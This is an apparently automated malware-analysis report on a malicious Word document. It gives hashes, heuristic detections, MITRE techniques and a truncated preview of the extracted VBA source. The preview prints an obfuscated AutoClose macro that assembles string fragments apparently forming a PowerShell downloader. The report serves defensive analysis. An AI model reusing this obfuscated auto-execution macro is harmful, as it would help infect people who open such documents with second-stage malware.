Office (OLE) malware analysis — malicious · dd848cdbc05d44a4

MALICIOUS

Office (OLE)

219.5 KB Created: 2018-12-19 02:00:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: e29f745f23af81313f65494585218a2c SHA-1: fde3deb9ccd31076af6653c99af9604d39200900 SHA-256: dd848cdbc05d44a47189a00fbd5f83cfce5e11a701259be772857dd1408be9e5

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoClose function that is triggered when the document is closed. This macro uses the Shell() function to execute a command. The reconstructed command string 'cli';$uorjenhuhxe');(';$uorjenhuhxe' suggests it is intended to download and execute a second-stage payload, likely via PowerShell. The presence of CreateObject and Environ() calls further supports this malicious intent.

Heuristics 8

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46164 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	46164 bytes
SHA-256: `3b3f05b000c189c8243f11b48540de7bf43db66c7dc9d95874d569fc824771dd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoClose() hnii50 = -8 + 53 mpay = -32762 xio = 57419 wowqb = Not (mpay > xio) ouzpoo8 = "cli';$" oyuzdyao = -13 + 108 htojreau = -91 + 136 wymenh = "nsaydliuejjiyku" y = -7131 oxe = (Not y) u = -28790 sw = (Not u) mqgsapm = "gqv='et.Web';$y" idxdsge = -127 + 179 iiwiey = -5 + 90 soufur = -30 - 130 eajfu = -65494 lsbrkzsw = (Not eajfu) ydhnwi = "uuxfveqyadze" obpsegm = -12 + 61 Z = 28221 cvfi = (Not Z) xww = -38770 xtgvr = (Not xww) yee = 59148 qdr = -64605 pkevo = Not (yee < qdr) eeeoynz = "yvdaq" pruk = -64859 eia = (Not pruk) Dim ouqfewxio As String ouqfewxio = -69 - 125 Dim igrydp As String igrydp = -82 * 28 uu = -65332 axqa9 = (Not uu) us = 3170 a = (Not us) uf = 52021 fjf = (Not uf) uuby = "kd='" xycbnqxkai = -96 / 52 gckaa77 = -74 + 106 y = 19669 uf = (Not y) rfajcm = -132 + 22 yukkoa = -47 + 81 dnyzckq = -154 / 1 acxiiog = "xe'');(';$uorjenhuh" ueuupigy = -145 * 174 Dim oviglwje As String oviglwje = -152 - 39 yicoeo = "eaw" osfuu = -150 + 106 cnztdaagext = -3 * 75 ez = -59572 ueee42 = 45444 a = Not (ez > ueee42) ehtvb = -115 * 19 opztz = 30926 fs = (Not opztz) blkkglovm = -176 * 29 eug = -65360 iejz = (Not eug) jxqupc = -171 - 76 qsfwoyo = ouzpoo8 & wymenh & mqgsapm & ydhnwi & eeeoynz & uuby & acxiiog & yicoeo joejz = 16696 l = -10787 gha = Not (joejz <= l) soeaatr13 = -41 / 55 hzos = 61060 alau25 = (Not hzos) wsznoyr = "dzeyvdaqk" ee = -51756 ey = (Not ee) moysnk7 = -120 + 129 Dim flneee As String flneee = -44 / 168 zyfce75 = -174 + 5 jieo = "d+$ygnliongiyeau" xbawa1 = -31 - 14 sgoe2 = -81 + 53 oplcc = 58049 ovai7 = 11397 fwbmc80 = Not (oplcc < ovai7) ewlopaaa9 = -167 * 170 Dim flgvzbttsa98 As Integer flgvzbttsa98 = -115 + 81 eumldae = "earmaoxb+$t" uuqli = -48 + 107 ajbfoarg7 = -146 * 160 ou = 4227 yggivh = (Not ou) xaxwg = 40434 oirg = (Not xaxwg) zoisa = "iemhf" eiwyy = -83 + 153 vyieai = "te" ibhepg6 = 30364 ivy = (Not ibhepg6) mqyhiviisq = -164 - 138 aywmt = -13530 czy = (Not aywmt) E = -34800 pqqxi = (Not E) qqsgsny = "mp" eao = 33994 oua = -62404 zk = Not (eao > oua) rhyjosti = -174 * 154 asmte = -52049 wgzr70 = 61282 tdayjs = Not (asmte > wgzr70) oucyig = vyieai & qqsgsny ugplsuku = -34 / 146 ac = 51488 uphe = -19269 wg = Not (ac < uphe) orryeqde = -169 + 153 ll = -43555 sn = -34335 ep = Not (ll > sn) rveyaqtkz84 = -43 / 152 eyoqhga4 = -9 * 26 eueousf = "fiqza" ntioy = -85 * 148 yfy = 27471 bo = 30423 aao = Not (yfy > bo) ywhhwxbyn = -116 + 178 stcea = "dqjpixuo0+$zx" aaeg = -2461 yyg = (Not aaeg) yfaixkhia = -50 / 61 urwhteqt2 = -143 / 67 cteabowe = -166 * 63 E = -11764 zhd = -35668 uf = Not (E <= zhd) irmthou = "e" oyuxg3 = "haxaura" dw = 20719 be = (Not dw) hlruq = -142 * 162 y = 61175 y = (Not y) Dim xiio95 As Integer xiio95 = -37 / 49 xqouzsa = "ooj1+$e" u = 38704 rtg = -4714 qviuo = Not (u > rtg) yikgizv = -101 + 29 Dim odfoiyi As Integer odfoiyi = -30 + 30 icl = -21497 zio = (Not icl) kxwrvy = -63 * 108 ujew = -54642 qaske = (Not ujew) uedblc = wsznoyr & jieo & eumldae & zoisa & eueousf & stcea & irmthou & oyuxg3 & xqouzsa igm = -27331 xqinn = -40298 o = Not (igm <= xqinn) koy = -55040 shc = (Not koy) ao = -5139 gd = 51295 qma = Not (ao < gd) sgerjzw1 = "$jrr" il = 65549 koe = (Not il) zknskasve = -137 * 75 yyia = -56 - 19 yju = 15135 qwert = Val(Application.MailSystem) Like Val(1) u = (Not yju) Dim tkcqdtvawd As String tkcqdtvawd = -63 + 142 bvwhpdi64 = "hioihyd" cvnyozebxu = -79 / 11 iyy = 11781 i = -14774 iqqm9 = Not (iyy >= i) yqnnrw = "ogcna" dhjzegxuan = -133 - 131 xteyw = 761 yswz = -43775 amhnv7 = Not (xteyw >= yswz) raee = -38092 jba = 42525 a = Not (raee > jba) xhwoe = -9768 eo ... (truncated)

SHA-256: 3b3f05b000c189c8243f11b48540de7bf43db66c7dc9d95874d569fc824771dd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoClose()
hnii50 = -8 + 53
mpay = -32762
xio = 57419
wowqb = Not (mpay > xio)
ouzpoo8 = "cli';$"
oyuzdyao = -13 + 108
htojreau = -91 + 136
wymenh = "nsaydliuejjiyku"
y = -7131
oxe = (Not y)
u = -28790
sw = (Not u)
mqgsapm = "gqv='et.Web';$y"
idxdsge = -127 + 179
iiwiey = -5 + 90
soufur = -30 - 130
eajfu = -65494
lsbrkzsw = (Not eajfu)
ydhnwi = "uuxfveqyadze"
obpsegm = -12 + 61
Z = 28221
cvfi = (Not Z)
xww = -38770
xtgvr = (Not xww)
yee = 59148
qdr = -64605
pkevo = Not (yee < qdr)
eeeoynz = "yvdaq"
pruk = -64859
eia = (Not pruk)
Dim ouqfewxio As String
ouqfewxio = -69 - 125
Dim igrydp As String
igrydp = -82 * 28
uu = -65332
axqa9 = (Not uu)
us = 3170
a = (Not us)
uf = 52021
fjf = (Not uf)
uuby = "kd='"
xycbnqxkai = -96 / 52
gckaa77 = -74 + 106
y = 19669
uf = (Not y)
rfajcm = -132 + 22
yukkoa = -47 + 81
dnyzckq = -154 / 1
acxiiog = "xe'');(';$uorjenhuh"
ueuupigy = -145 * 174
Dim oviglwje As String
oviglwje = -152 - 39
yicoeo = "eaw"
osfuu = -150 + 106
cnztdaagext = -3 * 75
ez = -59572
ueee42 = 45444
a = Not (ez > ueee42)
ehtvb = -115 * 19
opztz = 30926
fs = (Not opztz)
blkkglovm = -176 * 29
eug = -65360
iejz = (Not eug)
jxqupc = -171 - 76
qsfwoyo = ouzpoo8 & wymenh & mqgsapm & ydhnwi & eeeoynz & uuby & acxiiog & yicoeo
joejz = 16696
l = -10787
gha = Not (joejz <= l)
soeaatr13 = -41 / 55
hzos = 61060
alau25 = (Not hzos)
wsznoyr = "dzeyvdaqk"
ee = -51756
ey = (Not ee)
moysnk7 = -120 + 129
Dim flneee As String
flneee = -44 / 168
zyfce75 = -174 + 5
jieo = "d+$ygnliongiyeau"
xbawa1 = -31 - 14
sgoe2 = -81 + 53
oplcc = 58049
ovai7 = 11397
fwbmc80 = Not (oplcc < ovai7)
ewlopaaa9 = -167 * 170
Dim flgvzbttsa98 As Integer
flgvzbttsa98 = -115 + 81
eumldae = "earmaoxb+$t"
uuqli = -48 + 107
ajbfoarg7 = -146 * 160
ou = 4227
yggivh = (Not ou)
xaxwg = 40434
oirg = (Not xaxwg)
zoisa = "iemhf"
eiwyy = -83 + 153
vyieai = "te"
ibhepg6 = 30364
ivy = (Not ibhepg6)
mqyhiviisq = -164 - 138
aywmt = -13530
czy = (Not aywmt)
E = -34800
pqqxi = (Not E)
qqsgsny = "mp"
eao = 33994
oua = -62404
zk = Not (eao > oua)
rhyjosti = -174 * 154
asmte = -52049
wgzr70 = 61282
tdayjs = Not (asmte > wgzr70)
oucyig = vyieai & qqsgsny
ugplsuku = -34 / 146
ac = 51488
uphe = -19269
wg = Not (ac < uphe)
orryeqde = -169 + 153
ll = -43555
sn = -34335
ep = Not (ll > sn)
rveyaqtkz84 = -43 / 152
eyoqhga4 = -9 * 26
eueousf = "fiqza"
ntioy = -85 * 148
yfy = 27471
bo = 30423
aao = Not (yfy > bo)
ywhhwxbyn = -116 + 178
stcea = "dqjpixuo0+$zx"
aaeg = -2461
yyg = (Not aaeg)
yfaixkhia = -50 / 61
urwhteqt2 = -143 / 67
cteabowe = -166 * 63
E = -11764
zhd = -35668
uf = Not (E <= zhd)
irmthou = "e"
oyuxg3 = "haxaura"
dw = 20719
be = (Not dw)
hlruq = -142 * 162
y = 61175
y = (Not y)
Dim xiio95 As Integer
xiio95 = -37 / 49
xqouzsa = "ooj1+$e"
u = 38704
rtg = -4714
qviuo = Not (u > rtg)
yikgizv = -101 + 29
Dim odfoiyi As Integer
odfoiyi = -30 + 30
icl = -21497
zio = (Not icl)
kxwrvy = -63 * 108
ujew = -54642
qaske = (Not ujew)
uedblc = wsznoyr & jieo & eumldae & zoisa & eueousf & stcea & irmthou & oyuxg3 & xqouzsa
igm = -27331
xqinn = -40298
o = Not (igm <= xqinn)
koy = -55040
shc = (Not koy)
ao = -5139
gd = 51295
qma = Not (ao < gd)
sgerjzw1 = "$jrr"
il = 65549
koe = (Not il)
zknskasve = -137 * 75
yyia = -56 - 19
yju = 15135
qwert = Val(Application.MailSystem) Like Val(1)
u = (Not yju)
Dim tkcqdtvawd As String
tkcqdtvawd = -63 + 142
bvwhpdi64 = "hioihyd"
cvnyozebxu = -79 / 11
iyy = 11781
i = -14774
iqqm9 = Not (iyy >= i)
yqnnrw = "ogcna"
dhjzegxuan = -133 - 131
xteyw = 761
yswz = -43775
amhnv7 = Not (xteyw >= yswz)
raee = -38092
jba = 42525
a = Not (raee > jba)
xhwoe = -9768
eo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.